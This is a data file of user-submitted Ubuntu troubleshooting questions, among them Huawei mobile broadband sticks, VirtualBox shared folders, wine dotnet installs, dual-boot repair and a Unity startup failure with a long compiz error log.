419651	getting huawei mobile broadband e173 to work in ubuntu 13.10	i 'm trying to get a/an huawei e173 mobile broadband usb device to work with the network manager components in the gui ( ubuntu 13.10 ) . i 'm having no luck , but i can get it working successfully using wvdial . ( after much searching , i found someone else who was successful - http : //www.draisberghof.de/usb_modeswitch/bb/viewtopic.php ? t=657 ) . please is anyone able to suggest ideas or help me resolve this ? i would really like to have everything working in as user-friendly and integrated into the gui as possible . i believe the issue is not with usb_modeswitch . a fresh installation of ubuntu will correctly change the mode of the device , and the pid changes from 1c0b to 1c05 . my only hunch so far could be that networkmanager is using the wrong ttyusb device : my wvdial configuration uses /dev/ttyusb0 , but modem-manager-gui shows ttyusb2 . indeed , if i change wvdial to use /dev/ttyusb2 , that fails also . perhaps the solution if simply to change networkmanager to use ttyusb0 , but if so i do n't know how to do that . ( just in case it 's pertinent , modem-manager-gui is able to send sms successfully , no issue there . ) all questions and suggestions welcome . i really do n't know anything about modem configuration so any help would be appreciated . thanks .
419658	shared folder crashing ubuntu vm ( mac os host )	this is a repost from stackexchange/superuser ( i 'm not sure exactly which is best forum for this question ) . i have managed to set up an ubuntu server vm which will eventually be part of a small hadoop practice cluster . i have followed along with various tutorials online and i 'm now trying to set up a shared folder between the guest and host os . i have installed the latest version of guest additions using the built in package manager . the problem is that once i mount the shared folder in the guest os , if i try to ls the contents of that folder , the os hangs and i am forced to restart the vm . if i ls the folder prior to mounting the shared folder no errors occur . however , if i try to touch /media/sf_vmshare/testfile , the file appears in the corresponding host os directory as if everything is working correctly . i am at the limit of what i know to do to troubleshoot this on my own . if anyone had any suggestions as to what to try next i would be in your debt . thanks ! fyi : mount cmd : sudo mount -t vboxsf vmshare /media/sf_vmshare where vmshare is defined in the virtualbox manager .
419659	mobile-broadband stick sometimes not detected at all	my mobile-broadband usb stick ( lsusb : 12d1:1001 huawei technologies co. , ltd. e169/e620/e800 hsdpa modem ) is sometimes detected and sometimes not . scenario : i plug-in the stick . it sometimes start to blink and the mobile broadband connection appears in network manager . sometimes , after the plug-in , a return from suspend mode , or just after a disconnect , it 's not starting to blink or just seldomly and the connection does not appear again . lsusb does not find the device in the latter case . ( not as a normal usb stick , too - i am aware about the mode-switching issue in linux , but this does n't seem to be the problem here . ) sometimes ( in most cases ) a reboot helps . could it be an issue with usb ? maybe something with not providing enough power ? the system : ubuntu 12.04 on thinkpad t60 what i tried until now : three different usb ports on the laptop plus using a usb-hub that is powered with an own power source sudo service network-manager restart sudo /etc/init.d/networking restart ( is depricated ) sudo ifdown -a & & sudo ifup -a looking into the mode-switching issue , but since the stick is not listed at all instead of being listed as storage , this seems not to be the issue here ) update : tailf /var/log/syslog feb 13 09:54:08 laptop networkmanager [ 2400 ] : < info > unmanaged device found ; state connected forced . ( see http : //bugs.launchpad.net/bugs/191889 ) feb 13 09:54:08 laptop networkmanager [ 2400 ] : < info > unmanaged device found ; state connected forced . ( see http : //bugs.launchpad.net/bugs/191889 ) feb 13 09:54:08 laptop networkmanager [ 2400 ] : < info > ( wlan0 ) : now managed feb 13 09:54:08 laptop networkmanager [ 2400 ] : < info > ( wlan0 ) : device state change : unmanaged - > unavailable ( reason 'managed ' ) [ 10 20 2 ] feb 13 09:54:08 laptop networkmanager [ 2400 ] : < info > ( wlan0 ) : bringing up device . feb 13 09:54:08 laptop networkmanager [ 2400 ] : < info > ( wlan0 ) : deactivating device ( reason 'managed ' ) [ 2 ] anybody any idea what the network manager is doing there and why ?
419660	create directory linked to external server ( website ) via ftp	i 'm totally new to ubuntu and linux in general , so please forgive me if this has been asked before . i 'm a web developer and have moved to ubuntu . i was wondering if it was possible to have a directory linked direct to my websites server ( via ftp ) rather than using a ftp client and uploading/downloading through that . ( pretty much exactly how the dropbox desktop app works ) thanks
419661	installation of dotnet 2.0 on 64 bit machine failing	there is another thread with almost the exact same question title , however the solution does not work for me ( possible updates for wine/ubuntu ? ) i 'm trying to install mathcad 14 on my ubuntu 12.04 64 bit machine . there are various things i need to install first , such as mdac2.6 , all of which i 've succesfully installed . however dotnet 2.0 refuses to follow suit . these are the commands i 've used : winearch=win32 wineprefix=~/.wine32 winecfg ( i set it to winxp ) env wineprefix=~/.wine32 winetricks dotnet20 that 's the advice from the previous question . i 've tried numerous other solutions all along the same lines ( make a win32 folder to install in 32 bit etc . ) but none have got me as far as the above method . here the installer opens and runs . however it aborts whilst running . i get the following messages in the terminal which may be of interest : mono does not appear to be installed working around wine bug 30845 -- using native fusion while installing ... note : command 'env winedlloverrides=mscoree , fusion=n wine dotnetfx.exe ' returned status 67 . aborting . after that last line it aborts and the gui says : '' the following error occurred during setup : installation failed '' which is obviously very useful./s i 've also tried to install dotnet4.0 in the hopes a more modern version could also work for mathcad . however i get to a similar point where an error occurs saying that a file could not be found . any help ? edit : my version of wine must have been unstable or something . i purged wine , deleted all the folders and reinstalled wine 1.6 and winetricks . after that dotnet20 installed straight away no problem .
419663	how do i change the size of a window that a custom .desktop launcher defaults to ?	i 've created a custom chrome application shortcut for a webapp that i need to use . is there a way to control its size ( height/width ) and/or placement . i was thinking that this might be an option in the .desktop file , but ca n't seem to figure out where this might be configured . i 'm using 13.10 with gnome-shell
419667	purging nginx didnt delete the configuration files	i just ran sudo apt-get purge nginx sudo apt-get autoremove but the folder /etc/nginx/still exists , with all its content intact . i guess i could rm the folder but that is not the point of my question . i would like to know why it was n't deleted automatically , as purge should do . did i miss a step ? i am running ubuntu 12.04
419669	razor-qt on ubuntu 13.10 problem	i added the repo , and did sudo apt-get update and got this : w : failed to fetch http : //ppa.launchpad.net/razor-qt/ppa/ubuntu/dists/trusty/main/binary-amd64/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/razor-qt/ppa/ubuntu/dists/trusty/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . what do i do ?
419670	can i erase windows 8 and install ubuntu instead ?	i recently bought a new laptop computer and have been unable to install ubuntu alongside the windows 8 operating system . i used to be able to install ubuntu alongside a windows os but with windows 8 that 's no longer possible or too difficult for me to master . i do n't really need windows so i just want to wipe the disk and do a clean install of ubuntu . what i want to know is if this is easy - as it used to be - or is it just as complicated as installing ubuntu alongside windows 8 . thanks for your replies .
419671	boot from cd from command line ?	long story short my laptop had ubuntu 12.04 and worked perfectly but upon trying to add windows 7 to my laptop i messed it up royally and now it loads immediately to the grub menu . from there the only options are ubuntu , ubuntu recovery mode , and 2 memory test options . nothing works and the screen just stays purple . i 've tried using nomodeset and that did n't work . at this point i'de really just like to run dban on it and start fresh but i ca n't figure out how to get it to boot from cd like this .
419672	how can i remove an application indicator in the panel for ubuntu 12.04 ?	the driver for my hp printer has installed an indicator in the panel . i have two problems with it . first , its design does n't fit that of the panel , so it looks ugly . second , it 's not very consistent on when it 's showed in the panel ; it first shows at startup , but if i close the application the indicator disappears . and if i open it again , it appears briefly and then it gets removed automatically . i would like to not have to close it manually every time for it to disappear . and i would like it even better , if i did n't see it at all . any help with for configuring this indicator will be greatly appreciated . have a nice day .
419679	after pm-suspend /wol the ( usb ) file system is read only	ubuntu server 12.04 for low-power home server ( nas mainly ) . system boots from usb pen-drive ( to keep all ide/sata ports available for raid , etc. ) . system will suspend when idle for time . pm-suspend is working . sudo etherwake -d 00:11:22:33:44:55 ( from another computer ) wakes the server up and it is back on line in less than 15s . so far so good . the problem is that on resume/wake-up the file system has changed to read-only . from my extensive searching this seems to indicate either ( 1 ) that the os thinks the drive is going bad or ( 2 ) the system comes out of sleep before the usb drive is ready and so back to ( 1 ) . can anyone suggest a fix for this ? many thanks .
419681	error compiling suphp	trying to install suphp , from source . but when i run : ./configure -- prefix=/usr -- sysconfdir=/etc -- with-apache-user=www-data -- with-setid-mode=paranoid make i get this error : error : in file included from /usr/include/apache2/ap_config.h:25:0 , from /usr/include/apache2/httpd.h:44 , from mod_suphp.c:24 : /usr/include/apache2/ap_hooks.h:39:17 : fatal error : apr.h : no such file or file directory # include `` apr.h '' ^ compilation terminated . latest , 0.7.1 downloaded from : www.suphp.org/download.html i'v checked multiply guides , but this one is the one i 'm currently following .
419682	output python command result to file	i want to use python as a calculator and output everything into file . but mamboleo @ mamboleo-k56cb : ~ $ python python 2.7.5+ ( default , sep 19 2013 , 13:48:49 ) [ gcc 4.8.1 ] on linux2 type `` help '' , `` copyright '' , `` credits '' or `` license '' for more information . > > > 5**555 > output traceback ( most recent call last ) : file `` < stdin > '' , line 1 , in < module > nameerror : name 'output ' is not defined it gives me an error , and i could n't find how to output my result into text file . 2 > does not work either .
419683	configure larger font in jitsi on 3200x1800 resolution on 13 inch display	kde i installed jitsi chat on my lenovo yoga 2 pro on kubuntu . i already adjusted the main fonts to 230dpi in kde settings , but jitsi doesent obey this . how can i enlarge fonts in jitsi too ? unity on ubuntu 14.04 it is also a problem : there i adjusted the overall text-scale-factor to x2.0 with unity-tweak-tool , and it adjusts the fonts in jitsy as desired , but it doesnt ajust the lineheight of one contact :
419688	restarting services/programs disabled with lm-profiler	i was messing around with lm-profiler and i disabled a couple of things that now have made my laptop not connect to any wireless networks . does anyone have any pointers on how i can get this fixed ?
419697	how can i manually build usb multiboot drive without multiboot manager like yumi	i want to make a multiboot usb drive , but i ca n't find a good manager to do so . i have tried multisystem and yumi . multisystem does weird things with some of the isos , and makes a mess out of grub . yumi did n't support most of the isos i gave it . so my idea was to manual point a boot loader installed to the flashdrive at an iso file , also on the flashdrive . preferably the bootloader would be plop , or plopkexec , and would auto detect isos in a specific folder on the drive . but it would be ok to have to modify a config file whenever i add to the drive . will this work ? if so , how ?
419698	usb drive not functioning	using ubuntu 13.10 on an asus 1015e-ds03 . using gparted , i formatted my usb drive to fat32 . then images an iso file to it using dd . tried formatting again , and it just says unformatted with an error . thanks in advanced !
419701	expand home folder	i would like to make larger my home directory without screw up dual-booting with windows . i 'm stuck at the part boot from live cd and the use of gparted . so i have 64gb free space , i would like to add at least the half of it to my home folder . i read so many answers what to do but non said how . i 'm kinda new user . sudo fdisk -l : disk /dev/sda : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xe221b66e device boot start end blocks id system /dev/sda1 * 2048 209717247 104857600 7 hpfs/ntfs/exfat /dev/sda2 209717248 1953521663 871902208 7 hpfs/ntfs/exfat disk /dev/sdb : 200.0 gb , 200048565760 bytes 255 heads , 63 sectors/track , 24321 cylinders , total 390719855 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0a750a74 device boot start end blocks id system /dev/sdb1 * 2048 206847 102400 7 hpfs/ntfs/exfat /dev/sdb2 208894 390700799 195245953 f w95 ext 'd ( lba ) /dev/sdb5 40965813 390700799 174867493+ 7 hpfs/ntfs/exfat /dev/sdb6 32579584 40964095 4192256 82 linux swap / solaris /dev/sdb7 208896 32577535 16184320 83 linux partition table entries are not in disk order disk /dev/sdc : 3900 mb , 3900702720 bytes 190 heads , 32 sectors/track , 1253 cylinders , total 7618560 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xc3072e18 device boot start end blocks id system /dev/sdc1 * 32 7618558 3809263+ c w95 fat32 ( lba )
419702	problem booting after installing ubuntu 13.10 alongside windows 8.1	for the longest time i wanted to switch to linux , and after some research , ubuntu seemed the best bet . the last straw was when i bought an asus x75a-ds51 notebook , even after the free upgrade from windows 8 to 8.1 , i still could not stand it . here are the laptop 's specifications : http : //www.newegg.com/product/product.aspx ? item=n82e16834231037 after using an ubuntu 13.10 install disk and installing it on separate partitions than my windows 8.1 partitions , i get no boot menu when i start my laptop . i can only use it by putting the disc back in and running the live version . so i ran boot-repair and got this : efi detected . please check the options . the boot of your pc is in legacy mode . you may want to retry after changing it to efi mode . do you want to continue ? sudo chroot `` /mnt/boot-sav/sda11 '' dpkg -- configure -a sudo chroot `` /mnt/boot-sav/sda11 '' apt-get install -fy sudo chroot `` /mnt/boot-sav/sda11 '' apt-get purge -y -- force-yes grub*-common shim-signed linux-signed* sudo chroot `` /mnt/boot-sav/sda11 '' apt-get install -y -- force-yes grub-efi linux boot successfully repaired . please write on a paper the following url : paste.ubuntu.com/6918513/ in case you still experience boot problem , indicate this url to : boot.repair @ gmail.com or to your favorite support forum . you can now reboot your computer . please do not forget to make your bios boot on sda1/efi/ubuntu/grubx64.efi file ! a broken wubi has been detected . ( note : i did not use wubi . ) ** edit ** this is the error screen i am now getting when i try to boot : https : //www.dropbox.com/s/r6ibqu4p7dofuce/100_8497.jpg
419703	unity will not load after an upgrade to ubuntu 12.10 from 12.04	unity worked fine when i was running 12.04 and after the upgrade to 12.10 unity has not worked . i have tried installing unity tweak tool and resetting unity but it did n't work . i get this when i try to open unity from terminal . isaac @ linux-latitude-d830 : ~ $ unity compiz ( core ) - info : loading plugin : core compiz ( core ) - info : starting plugin : core unity-panel-service : no process found compiz ( core ) - info : loading plugin : ccp compiz ( core ) - info : starting plugin : ccp compizconfig - info : backend : gsettings compizconfig - info : integration : true compizconfig - info : profile : unity compiz ( core ) - info : loading plugin : composite compiz ( core ) - info : starting plugin : composite compiz ( core ) - info : loading plugin : opengl x error of failed request : badrequest ( invalid request code or no such operation ) major opcode of failed request : 136 ( glx ) minor opcode of failed request : 19 ( x_glxqueryserverstring ) serial number of failed request : 22 current serial number in output stream : 22 compiz ( core ) - info : unity is not supported by your hardware . enabling software rendering instead ( slow ) . x error of failed request : badrequest ( invalid request code or no such operation ) major opcode of failed request : 136 ( glx ) minor opcode of failed request : 19 ( x_glxqueryserverstring ) serial number of failed request : 22 current serial number in output stream : 22 compiz ( core ) - info : unity is not supported by your hardware . enabling software rendering instead ( slow ) . compiz ( core ) - info : starting plugin : opengl compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( core ) - error : plugin initscreen failed : opengl compiz ( core ) - error : failed to start plugin : opengl compiz ( core ) - info : unloading plugin : opengl compiz ( core ) - info : loading plugin : compiztoolbox compiz ( core ) - info : starting plugin : compiztoolbox compiz ( core ) - error : plugin 'opengl ' not loaded . compiz ( core ) - info : loading plugin : decor compiz ( core ) - info : starting plugin : decor compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( core ) - info : loading plugin : vpswitch compiz ( core ) - info : starting plugin : vpswitch compiz ( core ) - info : loading plugin : snap compiz ( core ) - info : starting plugin : snap compiz ( core ) - info : loading plugin : mousepoll compiz ( core ) - info : starting plugin : mousepoll compiz ( core ) - info : loading plugin : resize compiz ( core ) - info : starting plugin : resize compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( core ) - info : loading plugin : place compiz ( core ) - info : starting plugin : place compiz ( core ) - info : loading plugin : move compiz ( core ) - info : starting plugin : move compiz ( core ) - info : loading plugin : wall compiz ( core ) - info : starting plugin : wall compiz ( core ) - error : plugin 'opengl ' not loaded . compiz ( core ) - error : plugin init failed : wall compiz ( core ) - error : failed to start plugin : wall compiz ( core ) - info : unloading plugin : wall compiz ( core ) - info : loading plugin : grid compiz ( core ) - info : starting plugin : grid compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( core ) - info : loading plugin : regex compiz ( core ) - info : starting plugin : regex compiz ( core ) - info : loading plugin : imgpng compiz ( core ) - info : starting plugin : imgpng compiz ( core ) - info : loading plugin : session compiz ( core ) - info : starting plugin : session compiz ( core ) - info : loading plugin : gnomecompat compiz ( core ) - info : starting plugin : gnomecompat compiz ( core ) - info : loading plugin : animation compiz ( core ) - info : starting plugin : animation compiz ( core ) - error : plugin 'opengl ' not loaded . compiz ( core ) - error : plugin init failed : animation compiz ( core ) - error : failed to start plugin : animation compiz ( core ) - info : unloading plugin : animation compiz ( core ) - info : loading plugin : fade compiz ( core ) - info : starting plugin : fade compiz ( core ) - error : plugin 'opengl ' not loaded . compiz ( core ) - error : plugin init failed : fade compiz ( core ) - error : failed to start plugin : fade compiz ( core ) - info : unloading plugin : fade compiz ( core ) - info : loading plugin : unitymtgrabhandles compiz ( core ) - info : starting plugin : unitymtgrabhandles compiz ( core ) - error : plugin 'opengl ' not loaded . compiz ( core ) - error : plugin init failed : unitymtgrabhandles compiz ( core ) - error : failed to start plugin : unitymtgrabhandles compiz ( core ) - info : unloading plugin : unitymtgrabhandles compiz ( core ) - info : loading plugin : workarounds compiz ( core ) - info : starting plugin : workarounds compiz ( core ) - error : plugin 'opengl ' not loaded . compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( core ) - info : loading plugin : scale compiz ( core ) - info : starting plugin : scale compiz ( core ) - error : plugin 'opengl ' not loaded . compiz ( core ) - error : plugin init failed : scale compiz ( core ) - error : failed to start plugin : scale compiz ( core ) - info : unloading plugin : scale compiz ( core ) - info : loading plugin : expo compiz ( core ) - info : starting plugin : expo compiz ( core ) - error : plugin 'opengl ' not loaded . compiz ( core ) - error : plugin init failed : expo compiz ( core ) - error : failed to start plugin : expo compiz ( core ) - info : unloading plugin : expo compiz ( core ) - info : loading plugin : ezoom compiz ( core ) - info : starting plugin : ezoom compiz ( core ) - error : plugin 'opengl ' not loaded . compiz ( core ) - error : plugin init failed : ezoom compiz ( core ) - error : failed to start plugin : ezoom compiz ( core ) - info : unloading plugin : ezoom compiz ( core ) - info : loading plugin : unityshell compiz ( core ) - info : starting plugin : unityshell compiz ( core ) - error : plugin 'opengl ' not loaded . compiz ( core ) - error : plugin init failed : unityshell compiz ( core ) - error : failed to start plugin : unityshell compiz ( core ) - info : unloading plugin : unityshell compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( decor ) - warn : requested a pixmap type decoration when compositing is n't available compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( decor ) - warn : requested a pixmap type decoration when compositing is n't available compiz ( decor ) - warn : requested a pixmap type decoration when compositing is n't available compiz ( decor ) - warn : requested a pixmap type decoration when compositing is n't available compiz ( decor ) - warn : requested a pixmap type decoration when compositing is n't available compiz ( decor ) - warn : requested a pixmap type decoration when compositing is n't available compiz ( decor ) - warn : requested a pixmap type decoration when compositing is n't available compiz ( decor ) - warn : requested a pixmap type decoration when compositing is n't available compiz ( decor ) - warn : requested a pixmap type decoration when compositing is n't available compiz ( decor ) - warn : requested a pixmap type decoration when compositing is n't available compiz ( decor ) - warn : requested a pixmap type decoration when compositing is n't available compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( decor ) - warn : requested a pixmap type decoration when compositing is n't available compiz ( decor ) - warn : requested a pixmap type decoration when compositing is n't available compiz ( decor ) - warn : requested a pixmap type decoration when compositing is n't available compiz ( decor ) - warn : requested a pixmap type decoration when compositing is n't available compiz ( decor ) - warn : requested a pixmap type decoration when compositing is n't available compiz ( decor ) - warn : requested a pixmap type decoration when compositing is n't available compiz ( decor ) - warn : requested a pixmap type decoration when compositing is n't available compiz ( decor ) - warn : requested a pixmap type decoration when compositing is n't available compiz ( decor ) - warn : requested a pixmap type decoration when compositing is n't available compiz ( decor ) - warn : requested a pixmap type decoration when compositing is n't available compiz ( decor ) - warn : requested a pixmap type decoration when compositing is n't available compiz ( decor ) - warn : requested a pixmap type decoration when compositing is n't available compiz ( decor ) - warn : requested a pixmap type decoration when compositing is n't available compiz ( decor ) - warn : requested a pixmap type decoration when compositing is n't available compiz ( decor ) - warn : requested a pixmap type decoration when compositing is n't available compiz ( decor ) - warn : requested a pixmap type decoration when compositing is n't available compiz ( decor ) - warn : requested a pixmap type decoration when compositing is n't available compiz ( decor ) - warn : requested a pixmap type decoration when compositing is n't available compiz ( decor ) - warn : requested a pixmap type decoration when compositing is n't available compiz ( decor ) - warn : requested a pixmap type decoration when compositing is n't available compiz ( decor ) - warn : requested a pixmap type decoration when compositing is n't available compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0
419704	canon video camera ( hf-r40 ) : accessing the camera via wifi	i just got a new canon hf-r40 video camera . the thing has a built-in wifi radio , and i think i 've got it connected to my network . ( its mac address shows up correctly at the router , and i can ping it , so i do n't know how it could not be connected . ) supposedly it 's possible to talk to access recorded video over the network , but the documentation is woefully inadequate , but i think what it requires is a upnp client . i 've tried totem and vlc but i do n't really know how to create a url to access the device . i know the ip address it 's getting , but i have n't been able to make up a url that works . is there some way to do this ?
419708	suspending windows then starting ubuntu	i was wondering if there is a way to `` pause '' windows 8 then go switch over to ubuntu . occasionally when my laptop dies , it shuts down , but then will boot up without actually starting windows again . it shows the boot screen , but has my programs already open , and does not take a long time to load . last time this happened , i booted up ubuntu instead of windows , and when i needed to switch back to use windows , it retained the much faster start up speed . it has the programs open that were there when it ran out of battery . i have linux on a ssd , but due to windows coming on my laptop , it remains on my hdd . the boot time for windows is ridiculous , and i was hoping this would allow me to switch between the two more freely . if it helps i use a lenovo y580 . so is there a way to pause windows 8 , keeping programs open , then use ubuntu as my os , and then reboot back up windows keeping the programs and faster start time ? or is that just my laptop doing it ?
419709	what is xdiagnose ?	i was just browsing around when i came by this answer . it suggests removing xdiagnose if your laptop is overheating . i immediately fired up the dash and clicked on the xdiagnose icon , nothing happened . i searched around and saw this question . the answer was to run it as root user . i did that only to face this error : subroot @ subroot : ~ $ sudo xdiagnose [ sudo ] password for subroot : invalid mit-magic-cookie-1 keyinvalid mit-magic-cookie-1 key ** ( xdiagnose:5280 ) : warning ** : command line `dbus-launch -- autolaunch=7f8731869e1c690b8205727e0000000a -- binary-syntax -- close-stderr ' exited with non-zero exit status 1 : invalid mit-magic-cookie-1 keyinvalid mit-magic-cookie-1 keyautolaunch error : x11 initialization failed.\n traceback ( most recent call last ) : file `` /usr/bin/xdiagnose '' , line 37 , in < module > from xdiagnose.applet import xdiagnoseapplet file `` /usr/lib/python2.7/dist-packages/xdiagnose/applet.py '' , line 6 , in < module > from gi.repository import gtk file `` /usr/lib/python2.7/dist-packages/gi/importer.py '' , line 76 , in load_module dynamic_module._load ( ) file `` /usr/lib/python2.7/dist-packages/gi/module.py '' , line 224 , in _load overrides_modules = __import__ ( 'gi.overrides ' , fromlist= [ self._namespace ] ) file `` /usr/lib/python2.7/dist-packages/gi/overrides/gtk.py '' , line 1533 , in < module > raise runtimeerror ( `` gtk could n't be initialized '' ) runtimeerror : gtk could n't be initialized subroot @ subroot : ~ $ gksu xdiagnose does n't help either , it displays no errors but it does n't do anything either . then i tried removing it apt-get remove , only to be told that the ubuntu-desktop package will be removed also . of course i did n't . this brings me to my question , what is xdiagnose and what is it 's purpose ?
419710	after overheating touchpad and wifi do n't work	i 've got an hp probook 4530s with a synaptics touchpad . after installing ubuntu 13.10 i was doing some things on it and immediately it turned off . i restarted it , and it told me that it stopped because of overheating , so i entered the bios setup and disabled 'fan always on while on ac ' . when i logged in to my desktop , the touchpad and wifi did n't work and they still do n't work . do you have any idea what it could be ?
